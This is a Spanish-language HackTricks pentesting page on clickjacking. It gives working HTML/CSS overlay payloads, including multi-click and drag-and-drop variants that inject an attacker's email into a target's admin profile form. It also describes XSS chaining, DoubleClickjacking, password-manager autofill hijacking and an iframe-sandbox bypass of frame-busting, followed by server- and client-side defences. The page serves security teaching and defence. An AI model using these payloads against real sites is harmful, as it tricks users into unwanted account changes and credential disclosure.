Clickjacking

Reading time: 9 minutes

tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

¿Qué es Clickjacking

En un ataque de clickjacking, un/a usuario es engañado para hacer clic en un elemento de una página web que es invisible o está disfrazado como otro elemento. Esta manipulación puede provocar consecuencias no deseadas para el usuario, como la descarga de malware, la redirección a páginas web maliciosas, la entrega de credenciales o información sensible, transferencias de dinero o la compra en línea de productos.

Truco de prellenado de formularios

A veces es posible rellenar el valor de los campos de un formulario usando parámetros GET al cargar una página. Un atacante puede abusar de este comportamiento para completar un formulario con datos arbitrarios y enviar el payload de clickjacking para que el usuario pulse el botón Enviar.

Populate form with Drag&Drop

Si necesitas que el usuario complete un formulario pero no quieres pedirle directamente que escriba información específica (como el email o una contraseña concreta que conoces), puedes simplemente pedirle que Drag&Drop algo que escribirá tus datos controlados, como en este ejemplo.

Basic Payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Payload en varios pasos

css

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

css

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Si has identificado un XSS que requiere que un usuario haga clic en algún elemento para activar el XSS y la página es vulnerable a clickjacking, podrías abusar de ello para engañar al usuario y que haga clic en el botón/enlace.
Ejemplo:
Has encontrado un self XSS en algunos detalles privados de la cuenta (detalles que solo tú puedes configurar y leer). La página con el form para establecer esos detalles es vulnerable a Clickjacking y puedes prepopulate el form con los GET parameters.
Un atacante podría preparar un ataque de Clickjacking contra esa página prepopulating el form con el XSS payload y engañando al usuario para que envíe el formulario. Así, cuando se envíe el formulario y los valores se modifiquen, el usuario ejecutará el XSS.

DoubleClickjacking

Firstly explained in this post, esta técnica pediría a la víctima que haga doble clic en un botón de una página personalizada colocada en una ubicación específica, y usaría las diferencias de tiempo entre los eventos mousedown y onclick para cargar la página de la víctima durante el doble clic de modo que la víctima realmente haga clic en un botón legítimo en la página de la víctima.

Un ejemplo puede verse en este video: https://www.youtube.com/watch?v=4rGvRRMrD18

Un ejemplo de código puede encontrarse en this page.

warning

Esta técnica permite engañar al usuario para que haga clic en un único lugar de la página de la víctima sortando todas las protecciones contra clickjacking. Por eso el atacante debe encontrar acciones sensibles que se puedan realizar con un solo clic, como OAuth prompts accepting permissions.

Browser extensions: DOM-based autofill clickjacking

Además de iframing las páginas de la víctima, los atacantes pueden apuntar a elementos de la UI de las browser extensions que se inyectan en la página. Password managers renderizan autofill dropdowns cerca de los inputs enfocados; al enfocar un campo controlado por el atacante y ocultar/ocludir el dropdown de la extensión (trucos de opacity/overlay/top-layer), un clic forzado del usuario puede seleccionar un elemento almacenado y rellenar datos sensibles en inputs controlados por el atacante. Esta variante no requiere exposición mediante iframe y funciona completamente vía DOM/CSS manipulation.

For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategies to Mitigate Clickjacking

Client-Side Defenses

Los scripts ejecutados en el cliente pueden realizar acciones para prevenir Clickjacking:

Asegurarse de que la ventana de la aplicación es la ventana principal o top window.
Hacer visibles todos los frames.
Prevenir clics en frames invisibles.
Detectar y alertar a los usuarios sobre posibles intentos de Clickjacking.

Sin embargo, estos frame-busting scripts pueden ser eludidos:

Browsers' Security Settings: Algunos navegadores podrían bloquear estos scripts según sus ajustes de seguridad o por la falta de soporte de JavaScript.
HTML5 iframe sandbox Attribute: Un atacante puede neutralizar los frame buster scripts estableciendo el atributo sandbox con los valores allow-forms o allow-scripts sin allow-top-navigation. Esto impide que el iframe verifique si es la top window, por ejemplo,

html

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

Los valores allow-forms y allow-scripts permiten acciones dentro del iframe mientras deshabilitan la navegación a nivel superior. Para asegurar la funcionalidad prevista del sitio objetivo, podrían ser necesarios permisos adicionales como allow-same-origin y allow-modals, dependiendo del tipo de ataque. Los mensajes de la consola del navegador pueden indicar qué permisos permitir.

Server-Side Defenses

X-Frame-Options

La X-Frame-Options HTTP response header informa a los navegadores sobre la legitimidad de renderizar una página en un o , ayudando a prevenir Clickjacking:</p> <ul> <li>X-Frame-Options: deny - Ningún dominio puede incrustar el contenido.</li> <li>X-Frame-Options: sameorigin - Solo el mismo origen puede incrustar el contenido.</li> <li>X-Frame-Options: allow-from https://trusted.com - Solo el 'uri' especificado puede incrustar la página.</li> <li>Note the limitations: if the browser doesn't support this directive, it might not work. Some browsers prefer the CSP frame-ancestors directive.</li> </ul> <h4 id="content-security-policy-csp-frame-ancestors-directive"><a class="header" href="#content-security-policy-csp-frame-ancestors-directive">Content Security Policy (CSP) frame-ancestors directive</a></h4> <p><strong>frame-ancestors directive in CSP</strong> es el método recomendado para la protección contra Clickjacking:</p> <ul> <li>frame-ancestors 'none' - Similar to X-Frame-Options: deny.</li> <li>frame-ancestors 'self' - Similar to X-Frame-Options: sameorigin.</li> <li>frame-ancestors trusted.com - Similar to X-Frame-Options: allow-from.</li> </ul> <p>For instance, the following CSP only allows framing from the same domain:</p> <p>Content-Security-Policy: frame-ancestors 'self';</p> <p>Further details and complex examples can be found in the <a href="https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors">frame-ancestors CSP documentation</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors">Mozilla's CSP frame-ancestors documentation</a>.</p> <h3 id="content-security-policy-csp-with-child-src-and-frame-src"><a class="header" href="#content-security-policy-csp-with-child-src-and-frame-src">Content Security Policy (CSP) with child-src and frame-src</a></h3> <p><strong>Content Security Policy (CSP)</strong> es una medida de seguridad que ayuda a prevenir Clickjacking y otros ataques de inyección de código al especificar qué fuentes debe permitir el navegador para cargar contenido.</p> <h4 id="frame-src-directive"><a class="header" href="#frame-src-directive">frame-src Directive</a></h4> <ul> <li>Defines valid sources for frames.</li> <li>More specific than the default-src directive.</li> </ul> <pre><code>Content-Security-Policy: frame-src 'self' https://trusted-website.com; </code></pre> <p>Esta política permite frames del mismo origen (self) y https://trusted-website.com.</p> <h4 id="child-src-directiva"><a class="header" href="#child-src-directiva">child-src Directiva</a></h4> <ul> <li>Introducida en CSP nivel 2 para establecer fuentes válidas para web workers y frames.</li> <li>Actúa como fallback para frame-src y worker-src.</li> </ul> <pre><code>Content-Security-Policy: child-src 'self' https://trusted-website.com; </code></pre> <p>Esta política permite frames y workers desde el mismo origen (self) y https://trusted-website.com.</p> <p><strong>Notas de uso:</strong></p> <ul> <li>Deprecación: child-src está siendo eliminado en favor de frame-src y worker-src.</li> <li>Comportamiento de fallback: Si frame-src está ausente, child-src se usa como fallback para frames. Si ambos están ausentes, se usa default-src.</li> <li>Definición estricta de fuentes: Incluya únicamente fuentes de confianza en las directivas para prevenir explotación.</li> </ul> <h4 id="scripts-frame-busting-en-javascript"><a class="header" href="#scripts-frame-busting-en-javascript">Scripts frame-busting en JavaScript</a></h4> <p>Aunque no son completamente infalibles, los scripts frame-busting basados en JavaScript pueden usarse para evitar que una página web sea enmarcada. Ejemplo:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">if (top !== self) { top.location = self.location } </code></pre> <h4 id="uso-de-anti-csrf-tokens"><a class="header" href="#uso-de-anti-csrf-tokens">Uso de Anti-CSRF Tokens</a></h4> <ul> <li><strong>Validación de tokens:</strong> Utiliza anti-CSRF tokens en aplicaciones web para asegurar que las solicitudes que cambian el estado se realicen intencionalmente por el usuario y no a través de una página Clickjacked.</li> </ul> <h2 id="referencias"><a class="header" href="#referencias">Referencias</a></h2> <ul> <li><a href="https://portswigger.net/web-security/clickjacking"><strong>https://portswigger.net/web-security/clickjacking</strong></a></li> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html"><strong>https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html</strong></a></li> <li><a href="https://marektoth.com/blog/dom-based-extension-clickjacking/">DOM-based Extension Clickjacking (marektoth.com)</a></li> </ul> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>Aprende y practica Hacking en AWS:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/arte"><strong>HackTricks Training AWS Red Team Expert (ARTE)</strong></a><img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><br /> Aprende y practica Hacking en GCP: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/grte"><strong>HackTricks Training GCP Red Team Expert (GRTE)</strong></a><img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"> Aprende y practica Hacking en Azure: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/azrte"><strong>HackTricks Training Azure Red Team Expert (AzRTE)</strong></a><img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"></p> <details> <summary>Apoya a HackTricks</summary> <ul> <li>Revisa los <a href="https://github.com/sponsors/carlospolop"><strong>planes de suscripción</strong></a>!</li> <li><strong>Únete al</strong> 💬 <a href="https://discord.gg/hRep4RUj7f"><strong>grupo de Discord</strong></a> o al <a href="https://t.me/peass"><strong>grupo de telegram</strong></a> o <strong>síguenos en</strong> <strong>Twitter</strong> 🐦 <a href="https://twitter.com/hacktricks_live"><strong>@hacktricks_live</strong></a><strong>.</strong></li> <li><strong>Comparte trucos de hacking enviando PRs a los</strong> <a href="https://github.com/carlospolop/hacktricks"><strong>HackTricks</strong></a> y <a href="https://github.com/carlospolop/hacktricks-cloud"><strong>HackTricks Cloud</strong></a> repositorios de github.</li> </ul> </details> </div> </main> <nav class="nav-wrapper" aria-label="Page navigation">  <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <i class="fa fa-angle-right"></i> </a> <div style="clear: both"></div> </nav> <nav class="nav-wide-wrapper" aria-label="Page navigation"> <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i><span style="font-size: medium; align-self: center; margin-left: 10px;">Cache Poisoning to DoS</span> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <span style="font-size: medium; align-self: center; margin-right: 10px;">Client Side Template Injection (CSTI)</span><i class="fa fa-angle-right"></i> </a> </nav> </div> <div class="sidetoc"> <div class="sidetoc-wrapper"> <nav class="pagetoc"></nav> <a class="sidesponsor" href="" target="_blank"> <img src="" alt="" srcset=""> <div class="sponsor-title"> </div> <div class="sponsor-description"> </div> <div class="sponsor-cta"></div> </a> </div> </div> </div> <div class="footer"> <div id="theme-wrapper" class="theme-wrapper"> <div id="theme-btns" class="theme-btns"> <button id="hacktricks-light" type="button" role="radio" aria-label="Switch to light theme" aria-checked="false" class="theme"> <i class="fa fa-sun-o"></i> </button> <button id="hacktricks-dark" type="button" role="radio" aria-label="Switch to dark theme" aria-checked="false" class="theme theme-selected"> <i class="fa fa-moon-o"></i> </button> </div> </div> </div> </div> </div> <script> window.playground_copyable = true; </script> <script src="../elasticlunr.min.js"></script> <script src="../mark.min.js"></script>  <script src="../clipboard.min.js"></script> <script src="../highlight.js"></script> <script src="../book.js"></script>  <script src="../theme/pagetoc.js"></script> <script src="../theme/tabs.js"></script> <script src="../theme/ht_searcher.js"></script> <script src="../theme/sponsor.js"></script> <script src="../theme/ai.js"></script>  <script defer src="https://www.fairanalytics.de/pixel/deXeO7BNBrMuhdG1"></script> </div> </body> </html>